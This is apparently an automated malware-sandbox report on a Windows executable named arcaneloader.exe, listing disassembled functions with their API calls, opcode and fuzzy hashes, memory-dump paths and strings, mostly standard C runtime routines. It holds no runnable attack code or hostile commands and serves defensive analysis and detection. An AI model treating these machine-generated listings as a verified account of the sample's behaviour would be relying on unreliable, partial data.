                                                                          • Opcode ID: 40cd342412cce9c63e5f2e1198e7044465d0cd0b8885f26fb9eaadacf495ea36
                                                                          • Instruction ID: 4db7945baa3517112776b213fff0789b628975e33c5901ae2e576bb0bbe8c7dc
                                                                          • Opcode Fuzzy Hash: 40cd342412cce9c63e5f2e1198e7044465d0cd0b8885f26fb9eaadacf495ea36
                                                                          • Instruction Fuzzy Hash: 6DB16B311106089FD715CF28C48AB657BE0FF55364F298699E999CF3A1C335E982CB54
                                                                          APIs
                                                                            • Part of subcall function 00DCB807: RtlAllocateHeap.NTDLL(00000008,?,?,?,00DCA057,00000001,00000364,?,00000005,000000FF,?,00DC6E25,00DD9D20,0000000C), ref: 00DCB848
                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DCC8CB
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00DCC9BF
                                                                          • FindClose.KERNEL32(00000000), ref: 00DCC9FE
                                                                          • FindClose.KERNEL32(00000000), ref: 00DCCA31
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                          • String ID:
                                                                          • API String ID: 4087847297-0
                                                                          • Opcode ID: e0507daee17c1bcd40632f611c0111f147d5657d48bd5f4f14a6c5a98b540335
                                                                          • Instruction ID: b53fe8fd44b1bea7184cb642db9cec5436f6db90f1ab2a9687a7b16b77903064
                                                                          • Opcode Fuzzy Hash: e0507daee17c1bcd40632f611c0111f147d5657d48bd5f4f14a6c5a98b540335
                                                                          • Instruction Fuzzy Hash: 8451317691020AAEDF249F689C85FBFB7A9DF85314F2851ADF50D93241EB308D429B70
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00DC5216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessor
                                                                          • String ID:
                                                                          • API String ID: 2325560087-0
                                                                          • Opcode ID: 8ce17687afcb19b1f1ab158bade8535866b13ed2393f0b052e4f329fd588ea2d
                                                                          • Instruction ID: 573439d8e9dafc8a2258cf78c5d94cfe6faf7346221ceebb61ba4257b506ff74
                                                                          • Opcode Fuzzy Hash: 8ce17687afcb19b1f1ab158bade8535866b13ed2393f0b052e4f329fd588ea2d
                                                                          • Instruction Fuzzy Hash: 0D5169B191275A8FDB15CF54E891BAABBF0FB48354F28952ED401EB354D3B4A940CFA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: k#fz
                                                                          • API String ID: 0-1948189604
                                                                          • Opcode ID: ecb374a3065b06d37f247a068d3bd73fd6901db17c227950d9ddeea9088cc685
                                                                          • Instruction ID: 01adca432304223e6a35116993e3600f871bcd77121227615c718003b0c6c1a1
                                                                          • Opcode Fuzzy Hash: ecb374a3065b06d37f247a068d3bd73fd6901db17c227950d9ddeea9088cc685
                                                                          • Instruction Fuzzy Hash: 79D13072E115188FDB10CFBDC94069DB7F2AB88730F2A8369E875FB2D4D63499418B90
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 00DC543D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 8d729256a2e2e2bafaeb4ae07926c59f1be669a52c9e8136c1b1d970b2c8b69b
                                                                          • Instruction ID: dca87418d44ad806567498bbd7bb7b0a6c19cb8b57616ef654d78b4d6f81e2b9
                                                                          • Opcode Fuzzy Hash: 8d729256a2e2e2bafaeb4ae07926c59f1be669a52c9e8136c1b1d970b2c8b69b
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: 52a890c9277b7a3191291b49044d608b1462515f4b67b1847f51634cc061107d
                                                                          • Instruction ID: 338b7260b97505eabb2499d2c6793f46079df4fff4080b4c7916925442fc30a2
                                                                          • Opcode Fuzzy Hash: 52a890c9277b7a3191291b49044d608b1462515f4b67b1847f51634cc061107d
                                                                          • Instruction Fuzzy Hash: 41A01130A033028B8B808F32AF0820A3BAAAA002A2B0080AAA000C0320EA3080008B20
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 66a879987149e2b380fb8d0fb6e696a69d725de9a0541ecce2665ff08267de58
                                                                          • Instruction ID: 9bea7a94564de7870d743afb0d27ddc00f0ac8e9908ee15c787a3bd2a72f6959
                                                                          • Opcode Fuzzy Hash: 66a879987149e2b380fb8d0fb6e696a69d725de9a0541ecce2665ff08267de58
                                                                          • Instruction Fuzzy Hash: 6232B176E446848FEB018ABCC4A53DF6FF28B6B334F2A1719C5A46F3D6D917440A8B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3947b91e28bdc4a4f8a9e9cac0b1d618037a9a0517b49c3a1eb3ae4ccb654ad4
                                                                          • Instruction ID: cdf7a21b2dd592eb652bbd398c66529e4ce0b018ce177c6b1e56abf1234094a5
                                                                          • Opcode Fuzzy Hash: 3947b91e28bdc4a4f8a9e9cac0b1d618037a9a0517b49c3a1eb3ae4ccb654ad4
                                                                          • Instruction Fuzzy Hash: 3002A177A916504FEF01497CC8B83DB1BE747A7735F2A672ACAB05B2E2C55B000E9B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f33a063f55e786b5dcc5f2fa27299d93101ace126383c6c7f0e67dbf6dc5036c
                                                                          • Instruction ID: e1b84b21c67c5b420d3dab82c25b1f6b1477b2e708472eba3f0e8e9158290bc4
                                                                          • Opcode Fuzzy Hash: f33a063f55e786b5dcc5f2fa27299d93101ace126383c6c7f0e67dbf6dc5036c
                                                                          • Instruction Fuzzy Hash: 0CE11B72A505508FDF008A7CC8A93DF2FE2476B334F2A2726D9B4AF7D2D65744095B60
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52b1ef97265a5e021dc969116d9572a748967ae696cddb2c31dcd57116f9955d
                                                                          • Instruction ID: 0ae6a6f7ec90a90641f620a6071285543772567186163c559a337e616de80c8e
                                                                          • Opcode Fuzzy Hash: 52b1ef97265a5e021dc969116d9572a748967ae696cddb2c31dcd57116f9955d
                                                                          • Instruction Fuzzy Hash: 12D06C3A645A58AFC210CF49E840D41F7A8FB89670B164466EA0893B20C331F811CAE0
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00DC91F2
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00DC9300
                                                                          • CatchIt.LIBVCRUNTIME ref: 00DC9351
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00DC9452
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00DC946D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 4119006552-393685449
                                                                          • Opcode ID: f3221aabbb005c328a2b67b0b689f6412f16c7edc7dced675bdc38a9b6f32818
                                                                          • Instruction ID: f3bd29cb3a248a5f28ff23c6c37f826e9f355f7a34a9f8c83014e68ea1cae416
                                                                          • Opcode Fuzzy Hash: f3221aabbb005c328a2b67b0b689f6412f16c7edc7dced675bdc38a9b6f32818
                                                                          • Instruction Fuzzy Hash: 36B1793180020AEFCF19DFA4D899EAEF7B5EF04310B58415EE8116B256C731EA52CBB5
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(034A4DC0,034A4DC0,00000000,7FFFFFFF,?,00DD02F3,034A4DC0,034A4DC0,00000000,034A4DC0,?,?,?,?,034A4DC0,00000000), ref: 00DD03AE
                                                                          • __alloca_probe_16.LIBCMT ref: 00DD0469
                                                                          • __alloca_probe_16.LIBCMT ref: 00DD04F8
                                                                          • __freea.LIBCMT ref: 00DD0543
                                                                          • __freea.LIBCMT ref: 00DD0549
                                                                          • __freea.LIBCMT ref: 00DD057F
                                                                          • __freea.LIBCMT ref: 00DD0585
                                                                          • __freea.LIBCMT ref: 00DD0595
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                          • String ID:
                                                                          • API String ID: 127012223-0
                                                                          • Opcode ID: ae34385eac750efcc8e045489f8372769108197d4d6e5a4a873fc05b3aaa53ab
                                                                          • Instruction ID: c7dd95b3e1c1cbb5417dae4e3bece374aa316b24755b2148788f6ab74198d99a
                                                                          • Opcode Fuzzy Hash: ae34385eac750efcc8e045489f8372769108197d4d6e5a4a873fc05b3aaa53ab
                                                                          • Instruction Fuzzy Hash: B4719272900246ABDF219EA4A842FAE7FB9DFC9310F18055BED55A7381E775DD008B70
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00DC6167
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00DC616F
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00DC61F8
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00DC6223
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00DC6278
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 1170836740-1018135373
                                                                          • Opcode ID: c502f363746e5750f7eb2209ed38b7527fc22a2c59c58d55f767665b3e1a25b2
                                                                          • Instruction ID: baa34977bbfe2d982483de8172dc7703e90a541556c951a917bec9650e2c831f
                                                                          • Opcode Fuzzy Hash: c502f363746e5750f7eb2209ed38b7527fc22a2c59c58d55f767665b3e1a25b2
                                                                          • Instruction Fuzzy Hash: 80418334A0021AEBCF10DF69C855F9EBBA5EF45314F18815EE815AB352D731EA05CBB1
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00DC8831,00DC5F0D,00DC55A4), ref: 00DC8848
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DC8856
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DC886F
                                                                          • SetLastError.KERNEL32(00000000,00DC8831,00DC5F0D,00DC55A4), ref: 00DC88C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: 6bc6a4226fe83af01f604e1150205cae216e588a40ad265c9d5fa45e2eb3f297
                                                                          • Instruction ID: bc0198a69c519071418abe71625078cd804847c60c5700ee0cac2fb97840f8a6
                                                                          • Opcode Fuzzy Hash: 6bc6a4226fe83af01f604e1150205cae216e588a40ad265c9d5fa45e2eb3f297
                                                                          • Instruction Fuzzy Hash: 3501B53211A3139DEA242AB4BC86F6A2765EF517B4365023FF010C76E1EF218C017274
                                                                          Strings
                                                                          • C:\Users\user\Desktop\arcaneloader.exe, xrefs: 00DCCB70
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: C:\Users\user\Desktop\arcaneloader.exe
                                                                          • API String ID: 0-3267672541
                                                                          • Opcode ID: ce3f377bd1131e099e7f39d55473c9374c2d173e214fd22cf1ee129ad6068452
                                                                          • Instruction ID: b8b64b6b8165deddbca5941780c5d62e5d308860d8b367aa7ed0bd5b45a1935f
                                                                          • Opcode Fuzzy Hash: ce3f377bd1131e099e7f39d55473c9374c2d173e214fd22cf1ee129ad6068452
                                                                          • Instruction Fuzzy Hash: EE21C271210207AFCB20AFA5CD82F2A77A9EF403A4704551DFA1CD7151D730EC419BB0
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D6D5FCFF,?,?,00000000,00DD25EB,000000FF,?,00DC7015,00000002,?,00DC70B1,00DC83A0), ref: 00DC6F89
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DC6F9B
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DD25EB,000000FF,?,00DC7015,00000002,?,00DC70B1,00DC83A0), ref: 00DC6FBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2147091199.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2147068779.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147128654.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147155361.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147182577.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147268087.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147317395.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2147383554.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 8df06f3380ac59d06792f2e3e6700fab88e73b3a3510d5b24325358cd0fc221f
                                                                          • Instruction ID: 03d4b4e5e3459ac4a1a583b1ffa2130faace4379d8f4b37952234c9616b1549f
                                                                          • Opcode Fuzzy Hash: 8df06f3380ac59d06792f2e3e6700fab88e73b3a3510d5b24325358cd0fc221f
                                                                          • Instruction Fuzzy Hash: 00016231944719AFDB119F50DC09FAEBBB8FF44B25F04052AE811E2790DBB5D904CAB4
                                                                          APIs
                                                                          • __alloca_probe_16.LIBCMT ref: 00DCDFA2
                                                                          • __alloca_probe_16.LIBCMT ref: 00DCE06B
                                                                          • __freea.LIBCMT ref: 00DCE0D2
                                                                            • Part of subcall function 00DCBC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00DC41E0,?,?,00DC1007,?,00DBFAB5), ref: 00DCBC77
                                                                          • __freea.LIBCMT ref: 00DCE0E5
                                                                          • __freea.LIBCMT ref: 00DCE0F2
                                                                          Memory Dump Source
